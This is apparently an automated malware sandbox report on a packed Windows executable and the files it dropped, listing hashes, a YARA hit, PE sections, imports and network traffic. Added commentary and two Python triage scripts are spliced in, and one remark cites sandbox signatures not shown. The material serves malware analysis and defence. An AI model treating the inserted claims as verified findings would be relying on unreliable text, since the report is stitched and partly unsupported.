                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.>.T.m.T.m.T.m."2m.T.m.".m.T.m."3mqT.m.,.m.T.m.T.m.T.m."6m.T.m.".m.T.m.".m.T.mRich.T.m........PE..L....8?`......................v.....`.............@...........................z......f......................................$...d....py..I....................y..... ..................................@............................................text............................... ..`.data...H.u.........................@....rsrc....I...py..J..................@..@.reloc...#....y..$..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\F11E.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1111994
                                                                                                                                                Entropy (8bit):7.9252602794269915
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:4CRVwOoPzND9Tl7RUGb+89w4ZFLkAPLYLSeUr:hOhJGTIAAcns
                                                                                                                                                MD5:27E7D6FAA08A1A69CB7C62D199B1B4F6
                                                                                                                                                SHA1:507F02D50BA701760A6D2303A648563030FB3ECD
                                                                                                                                                SHA-256:3896AD778346B9D5B04331410015969F2AF655B6277DBF612721027B73173E50
                                                                                                                                                SHA-512:7100ED807C5C1C56D5A3FCB4E69BE326F5D14BC44076E2E35355E6B8E3A175ED1B9FF4BC9C82FBCB1C19D1DD552E1D9242CD17CD5C44F9320C067ACA301D1059
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j@...!.R.!.R.!.R'Y.R4!.R'Y.R.!.R'Y.R=!.R.!.R.!.R'Y.Ry!.R'Y.R/!.R'Y.R/!.R'Y.R/!.RRich.!.R........PE..L....ALV.....................~......\.............@..........................`..........................................3...............xE..........................................................@...@...............(............................text...)........................... ..`.rdata...F.......H..................@..@.data...(.... ......................@....rsrc...xE.......F..."..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\F1AC.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3904000
                                                                                                                                                Entropy (8bit):7.959244774483495
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:zvl5DY66TDyQmymjivZkn7ikGqoa2+GEm:LY1TmlGv2nm2oa2+G
                                                                                                                                                MD5:3D0D60FAAE1EDD40DBF2CC9906FE2EC4
                                                                                                                                                SHA1:53B3CFBF2EBFFFD09932EF3DDC54BD993F2AD921
                                                                                                                                                SHA-256:D5758DC0615523F537C19BC7D9C6D7C530AAF3749C57147D6264EEA0DD24522A
                                                                                                                                                SHA-512:38F8701FC34D1FDD32B74EB3941180D542E859E2B3A2630767C2D0E3F992B4F5199DE38CEA6B67FC570FFE2C83F010F1DA4028519616272F36D01D887339103D
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....ya.........."......T...:9..........`8...@...... ........................;......`<...`...@......@............... ................................:.d............................................................................................`8.H...........Cgw(.O~.$+8.. ...,8.................@....text....S...`8..T...08............. ..`.rsrc...d.....:.......:.............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\FD36.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):516536
                                                                                                                                                Entropy (8bit):7.850812641211313
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:qw86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+ymtE:qVhdLVg2Zep7njXzPDxC+TE
                                                                                                                                                MD5:C55C023A1BEA32E71A99614D39DC4DD6
                                                                                                                                                SHA1:44809A18A01B2647C9A80AF0EF9CA131EEF34E97
                                                                                                                                                SHA-256:D7241A7DA97FDEFE199F23605BFAB8F878728A71F4B1B12F26AA83F775AE2FC5
                                                                                                                                                SHA-512:5A4A071A5CE5EB921738324AF71A8434DF5AF2219016006A0002D6918DCADAD8580BEF6D4973F05ACD9FF68C23DE6B8C3F6308709294DAD03D024068C9F42667
                                                                                                                                                Malicious:false
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\FD36.exe, Author: Florian Roth
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.............~.... ........@.. .......................@.......'....`.................................$...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`.......H........t..<k...........Y..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):6.008556977987189
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:Md0q201V1D.exe
                                                                                                                                                File size:346624
                                                                                                                                                MD5:a0bc297d8eaad37f1b145d108786e993
                                                                                                                                                SHA1:ac6858536f64ec7113f1cd10b248430da8510db8
                                                                                                                                                SHA256:b06b803c1a654849e7b0310b0b590ca574568ab9eba41858e8caaff5dbbeacba
                                                                                                                                                SHA512:8c18514c5d43497b5711131b0328cbf7c6ecd51f04a60f421175786c7431b999e30bd5b16fe9345c38fd3e0c26a682a611602a1b2fe657488485246b3ba3b541
                                                                                                                                                SSDEEP:3072:rwrBNjy106UX1gBXf8fVzu3kkGwSQ46yyZ4AX/cpM0p2a4sqOD06zWusdImyJLiT:0VT1fVzBnKyyH/cKy4sqOIwyy
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m..2m...m...m...m..3mq..m...m...m...m...m..6m...m...m...m...m...mRich...m................PE..L......_...........

File Icon

Icon Hash: aedaae9ecea62aa2

Static PE Info

General

Entrypoint: 0x41cb20
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x5FA116E2 [Tue Nov 3 08:37:54 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: e522cb867082e04c7a4b61561f8516ce

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FAB6473E7EBh
call 00007FAB64739636h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0043C9B0h
push 00421A40h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [0043E494h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401070h]
cmp dword ptr [02B339C4h], 00000000h
jne 00007FAB64739630h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [004010FCh]
call 00007FAB647397B3h
mov dword ptr [ebp-6Ch], eax
call 00007FAB64741A9Bh
test eax, eax
jne 00007FAB6473962Ch
push 0000001Ch
call 00007FAB64739770h
add esp, 04h
call 00007FAB647413F8h
test eax, eax
jne 00007FAB6473962Ch
push 00000010h
call 00007FAB6473975Dh
add esp, 04h
push 00000001h
call 00007FAB64741343h
add esp, 04h
call 00007FAB6473F15Bh
mov dword ptr [ebp-04h], 00000000h
call 00007FAB6473DB3Fh
test eax, eax

Rich Headers

Programming Language:
• [LNK] VS2010 build 30319
• [ASM] VS2010 build 30319
• [ C ] VS2010 build 30319
• [C++] VS2010 build 30319
• [RES] VS2010 build 30319
• [IMP] VS2008 SP1 build 30729

Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x3cfe4         | 0x64         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x2736000       | 0x3c00       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x273a000       | 0x1b90       | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x1230          | 0x1c         | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x1bfa0         | 0x40         | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x1000          | 0x1dc        | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

Sections

Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy       | Characteristics
.text  | 0x1000          | 0x3cb18      | 0x3cc00  | False    | 0.598652906379  | data      | 6.98974133443 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data  | 0x3e000         | 0x26f69c8    | 0x1600   | unknown  | unknown         | unknown   | unknown       | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pale  | 0x2735000       | 0x2e5        | 0x400    | False    | 0.0166015625    | data      | 0.0           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc  | 0x2736000       | 0x3c00       | 0x3c00   | False    | 0.746940104167  | data      | 6.42028876467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x273a000       | 0x123f0      | 0x12400  | False    | 0.0812553510274 | data      | 1.05090954457 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
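The section table and the entrypoint preview carry the static clues a triage analyst reads first: a .text section whose entropy is close to 7 bits per byte, a .data section whose virtual size (0x26f69c8, about 40 MB) is thousands of times its raw size, a non-standard section named .pale, and an entry stub that tests a global at VA 02B339C4h which sits in that oversized, zero-filled part of .data. The script below is an added example, not part of the sandbox report: it takes the section rows transcribed from the table above (with the unreported .data entropy set to 0.0) and turns them into findings, then maps the entrypoint and that global to the section and to whether the bytes exist on disk. The entropy and inflation thresholds, the set of "standard" section names, and the function names are this example's own assumptions.

```python
# Added example (not part of the sandbox report): static triage of the
# Sections table above. Section values are transcribed from the report;
# thresholds, STANDARD_NAMES and the helper names are assumptions.
from dataclasses import dataclass

IMAGE_BASE = 0x400000  # "Imagebase" field of the report


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: float
    flags: frozenset  # subset of {"CODE", "EXECUTE", "READ", "WRITE", "DISCARDABLE"}


# Section table of Md0q201V1D.exe as printed in the report (.data entropy is
# reported as "unknown"; 0.0 is used as a placeholder here).
SECTIONS = (
    Section(".text",  0x1000,    0x3cb18,   0x3cc00, 6.99, frozenset({"CODE", "EXECUTE", "READ"})),
    Section(".data",  0x3e000,   0x26f69c8, 0x1600,  0.0,  frozenset({"READ", "WRITE"})),
    Section(".pale",  0x2735000, 0x2e5,     0x400,   0.0,  frozenset({"READ", "WRITE"})),
    Section(".rsrc",  0x2736000, 0x3c00,    0x3c00,  6.42, frozenset({"READ"})),
    Section(".reloc", 0x273a000, 0x123f0,   0x12400, 1.05, frozenset({"READ", "DISCARDABLE"})),
)

STANDARD_NAMES = {".text", ".data", ".rdata", ".rsrc", ".reloc", ".bss",
                  ".idata", ".edata", ".tls", ".pdata", ".CRT"}
HIGH_ENTROPY = 6.8     # assumption: plain MSVC code rarely exceeds ~6.5 bits/byte
INFLATION_RATIO = 16   # assumption: virtual/raw ratio that signals a reserved unpack area


def triage_sections(sections):
    """Return {section name: [finding, ...]} for the static marks a packer leaves behind."""
    findings = {}
    for s in sections:
        notes = []
        if s.name not in STANDARD_NAMES:
            notes.append("nonstandard section name")
        if s.raw_size and s.virtual_size // s.raw_size >= INFLATION_RATIO:
            notes.append(f"virtual size is {s.virtual_size // s.raw_size}x the raw size "
                         "(zero-filled by the loader, populated at run time)")
        if "EXECUTE" in s.flags and s.entropy >= HIGH_ENTROPY:
            notes.append("high-entropy executable section (compressed or encrypted code)")
        if {"EXECUTE", "WRITE"} <= s.flags:
            notes.append("writable and executable")
        findings[s.name] = notes
    return findings


def locate_rva(sections, rva):
    """Map an RVA to (section name, backed_by_file_bytes); None if outside every section.

    backed_by_file_bytes is False when the RVA lies inside the section's virtual
    range but past its raw data, i.e. the bytes are zero on disk and only exist
    once the program has written them at run time."""
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + s.virtual_size:
            return s.name, rva < s.virtual_address + s.raw_size
    return None


def locate_va(sections, va, image_base=IMAGE_BASE):
    """Same as locate_rva but for a virtual address as shown in the disassembly."""
    return locate_rva(sections, va - image_base)


if __name__ == "__main__":
    for name, notes in triage_sections(SECTIONS).items():
        print(f"{name:7s}", notes or "no findings")
    # Entrypoint, and the global tested by the entry stub (cmp dword ptr [02B339C4h], 0).
    print("entrypoint 0x41cb20 ->", locate_va(SECTIONS, 0x41cb20))
    print("global     0x2B339C4 ->", locate_va(SECTIONS, 0x02B339C4))
```

The global at 02B339C4h resolving to .data with no file backing is the useful result: the entry stub branches on a value that is zero in the file and can only have been set by code that ran earlier in the same process, which is consistent with the report's unpacking and self-injection signatures.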

Resources

Name           | RVA       | Size   | Type | Language                   | Country
RT_ICON        | 0x2736240 | 0x25a8 | data | Spanish                    | Paraguay
RT_ICON        | 0x27387e8 | 0x10a8 | data | Spanish                    | Paraguay
RT_STRING      | 0x27399d0 | 0x72   | data | Divehi; Dhivehi; Maldivian | Maldives
RT_STRING      | 0x2739a48 | 0x1b6  | data | Divehi; Dhivehi; Maldivian | Maldives
RT_ACCELERATOR | 0x2739920 | 0x90   | data | Divehi; Dhivehi; Maldivian | Maldives
RT_ACCELERATOR | 0x27398b8 | 0x68   | data | Divehi; Dhivehi; Maldivian | Maldives
RT_GROUP_ICON  | 0x2739890 | 0x22   | data | Spanish                    | Paraguay
None           | 0x27399c0 | 0xa    | data | Divehi; Dhivehi; Maldivian | Maldives
None           | 0x27399b0 | 0xa    | data | Divehi; Dhivehi; Maldivian | Maldives

Imports

DLL          | Import
KERNEL32.dll | GetDriveTypeW, GetCPInfo, HeapAlloc, InterlockedIncrement, GetSystemWindowsDirectoryW, SetEnvironmentVariableW, QueryDosDeviceA, GetNamedPipeHandleStateA, SetHandleInformation, FindFirstFileExW, LockFile, BackupSeek, FreeEnvironmentStringsA, GetModuleHandleW, IsBadReadPtr, ActivateActCtx, GetPrivateProfileIntA, SetFileShortNameW, ReadConsoleInputA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, SetDllDirectoryA, GetSystemDirectoryA, CreateActCtxA, CompareStringW, GetStartupInfoW, VerifyVersionInfoW, TlsGetValue, GetLongPathNameW, SetLastError, GetProcAddress, FindVolumeMountPointClose, WriteProfileSectionA, GlobalGetAtomNameA, FindClose, GetPrivateProfileStringA, OpenWaitableTimerA, LocalAlloc, SetSystemTime, GetModuleFileNameA, FindFirstChangeNotificationA, GetProcessShutdownParameters, FreeEnvironmentStringsW, BuildCommDCBA, GetCurrentDirectoryA, CompareStringA, GetConsoleCursorInfo, TlsAlloc, GetWindowsDirectoryW, GetProfileSectionW, AreFileApisANSI, DeleteFileA, LocalFileTimeToFileTime, CloseHandle, SetStdHandle, GetLastError, GetConsoleAliasesLengthW, FlushFileBuffers, MoveFileA, GetCommandLineW, HeapSetInformation, InterlockedDecrement, DecodePointer, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, GetModuleFileNameW, WriteFile, GetStdHandle, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapValidate, TlsSetValue, TlsFree, HeapCreate, GetACP, GetOEMCP, IsValidCodePage, LoadLibraryW, RtlUnwind, RaiseException, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, LCMapStringW, MultiByteToWideChar, GetStringTypeW, CreateFileW
USER32.dll   | GetMenuInfo
GDI32.dll    | GetBitmapBits
WINHTTP.dll  | WinHttpReadData
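Two things about this import table are worth checking by hand. First, the Import Hash in the General section is an imphash-style value, so it pivots on the loader stub rather than on the payload: any sample built with the same stub and the same import order shares it. Second, none of the memory and thread APIs that process hollowing and PE injection need (VirtualAlloc, VirtualProtect, WriteProcessMemory, CreateRemoteThread, SetThreadContext, ResumeThread) appear here, while GetProcAddress and LoadLibraryW do, which means the behaviour the sandbox observed is driven by APIs resolved at run time. The script below is an added example, not the sandbox's code: it embeds the import list transcribed from the table above, implements the published imphash recipe (lowercased module name without its extension, a dot, the lowercased function name, joined with commas in import-table order, MD5), and reports the injection APIs that are absent from the static table. The list of "expected" injection APIs and the function names are this example's assumptions; the well-known-ordinal lookup that pefile adds for a few DLLs is left out, so ordinals are written as ordN.

```python
# Added example (not part of the sandbox report): imphash over the Imports
# table above, plus a check for which injection APIs are missing from it.
# Import names are transcribed from the report; INJECTION_APIS is an assumption.
import hashlib

KERNEL32 = """
GetDriveTypeW GetCPInfo HeapAlloc InterlockedIncrement GetSystemWindowsDirectoryW SetEnvironmentVariableW
QueryDosDeviceA GetNamedPipeHandleStateA SetHandleInformation FindFirstFileExW LockFile BackupSeek
FreeEnvironmentStringsA GetModuleHandleW IsBadReadPtr ActivateActCtx GetPrivateProfileIntA SetFileShortNameW
ReadConsoleInputA CopyFileW GetSystemWow64DirectoryW GetVersionExW SetDllDirectoryA GetSystemDirectoryA
CreateActCtxA CompareStringW GetStartupInfoW VerifyVersionInfoW TlsGetValue GetLongPathNameW
SetLastError GetProcAddress FindVolumeMountPointClose WriteProfileSectionA GlobalGetAtomNameA FindClose
GetPrivateProfileStringA OpenWaitableTimerA LocalAlloc SetSystemTime GetModuleFileNameA FindFirstChangeNotificationA
GetProcessShutdownParameters FreeEnvironmentStringsW BuildCommDCBA GetCurrentDirectoryA CompareStringA GetConsoleCursorInfo
TlsAlloc GetWindowsDirectoryW GetProfileSectionW AreFileApisANSI DeleteFileA LocalFileTimeToFileTime
CloseHandle SetStdHandle GetLastError GetConsoleAliasesLengthW FlushFileBuffers MoveFileA
GetCommandLineW HeapSetInformation InterlockedDecrement DecodePointer ExitProcess TerminateProcess
GetCurrentProcess UnhandledExceptionFilter SetUnhandledExceptionFilter IsDebuggerPresent EncodePointer GetModuleFileNameW
WriteFile GetStdHandle IsProcessorFeaturePresent EnterCriticalSection LeaveCriticalSection SetHandleCount
InitializeCriticalSectionAndSpinCount GetFileType DeleteCriticalSection QueryPerformanceCounter GetTickCount GetCurrentThreadId
GetCurrentProcessId GetSystemTimeAsFileTime GetEnvironmentStringsW HeapValidate TlsSetValue TlsFree
HeapCreate GetACP GetOEMCP IsValidCodePage LoadLibraryW RtlUnwind
RaiseException SetFilePointer WideCharToMultiByte GetConsoleCP GetConsoleMode OutputDebugStringA
WriteConsoleW OutputDebugStringW HeapReAlloc HeapSize HeapQueryInformation HeapFree
LCMapStringW MultiByteToWideChar GetStringTypeW CreateFileW
""".split()

# (module, function-name-or-ordinal) pairs in the order the report lists them.
IMPORTS = [("KERNEL32.dll", n) for n in KERNEL32] + [
    ("USER32.dll", "GetMenuInfo"),
    ("GDI32.dll", "GetBitmapBits"),
    ("WINHTTP.dll", "WinHttpReadData"),
]


def imphash_string(imports):
    """The comma-joined 'module.function' string that imphash hashes."""
    parts = []
    for dll, func in imports:
        mod = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if mod.endswith(ext):
                mod = mod[: -len(ext)]
                break
        name = f"ord{func}" if isinstance(func, int) else func.lower()
        parts.append(f"{mod}.{name}")
    return ",".join(parts)


def imphash(imports):
    """MD5 of imphash_string(); order-sensitive, case-insensitive."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


# APIs a program doing what the sandbox observed (hollowing, PE injection) would
# normally import statically. Assumption for this example.
INJECTION_APIS = ("VirtualAlloc", "VirtualAllocEx", "VirtualProtect", "WriteProcessMemory",
                  "CreateRemoteThread", "SetThreadContext", "ResumeThread", "NtUnmapViewOfSection")
DYNAMIC_LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def injection_api_gap(imports):
    """Return (missing injection APIs, can the binary resolve them at run time)."""
    names = {func for _, func in imports if isinstance(func, str)}
    missing = [api for api in INJECTION_APIS if api not in names]
    can_resolve = "GetProcAddress" in names and bool(DYNAMIC_LOADERS & names)
    return missing, can_resolve


if __name__ == "__main__":
    print("imphash:", imphash(IMPORTS))
    missing, can_resolve = injection_api_gap(IMPORTS)
    print("injection APIs absent from the import table:", ", ".join(missing))
    print("GetProcAddress + LoadLibrary present:", can_resolve)
```

Compare the printed hash with the Import Hash field above: it matches only if the list in the report is in true import-table order, which is exactly the property that makes imphash a pivot on the stub and useless as a pivot on the stolen payload.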

Possible Origin

Language of compilation system | Country where language is spoken
Spanish                        | Paraguay
Divehi; Dhivehi; Maldivian     | Maldives

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            | Source Port | Dest Port | Source IP    | Dest IP
Oct 29, 2021 14:08:51.100342035 CEST | 443         | 49727     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.100454092 CEST | 49727       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.103466034 CEST | 443         | 49728     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.103553057 CEST | 49728       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.103971004 CEST | 49728       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.104809999 CEST | 49728       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.104837894 CEST | 443         | 49728     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.109190941 CEST | 49727       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.109859943 CEST | 49727       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.109889984 CEST | 443         | 49727     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.113672018 CEST | 443         | 49726     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.113704920 CEST | 443         | 49726     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.113754034 CEST | 49726       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.113759041 CEST | 443         | 49726     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.113780975 CEST | 49726       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.113785982 CEST | 443         | 49726     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.113828897 CEST | 49726       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.113846064 CEST | 49726       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.133817911 CEST | 49726       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.133856058 CEST | 443         | 49726     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.134253025 CEST | 443         | 49727     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.134274960 CEST | 443         | 49727     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.134308100 CEST | 443         | 49727     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.134351969 CEST | 49727       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.134393930 CEST | 49727       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.134413004 CEST | 443         | 49727     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.134495974 CEST | 49727       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.137830973 CEST | 443         | 49728     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.137876987 CEST | 443         | 49728     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.137945890 CEST | 49728       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.137962103 CEST | 443         | 49728     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.137984991 CEST | 49728       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.138011932 CEST | 49728       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.175230980 CEST | 49727       | 443       | 192.168.2.3  | 23.211.6.115
Oct 29, 2021 14:08:51.175271988 CEST | 443         | 49727     | 23.211.6.115 | 192.168.2.3
Oct 29, 2021 14:08:51.194941044 CEST | 49728       | 443       | 192.168.2.3  | 23.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.194991112 CEST4434972823.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.502331018 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.502394915 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.502491951 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.502819061 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.502841949 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.537333012 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.537538052 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.540394068 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.541007996 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.541039944 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.571634054 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.571659088 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.571698904 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.571820974 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.575550079 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.575575113 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.575692892 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.578891993 CEST49729443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.578917980 CEST4434972923.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.651262999 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.651331902 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.651452065 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.651649952 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.651667118 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.664989948 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.665050030 CEST4434973223.211.6.115192.168.2.3
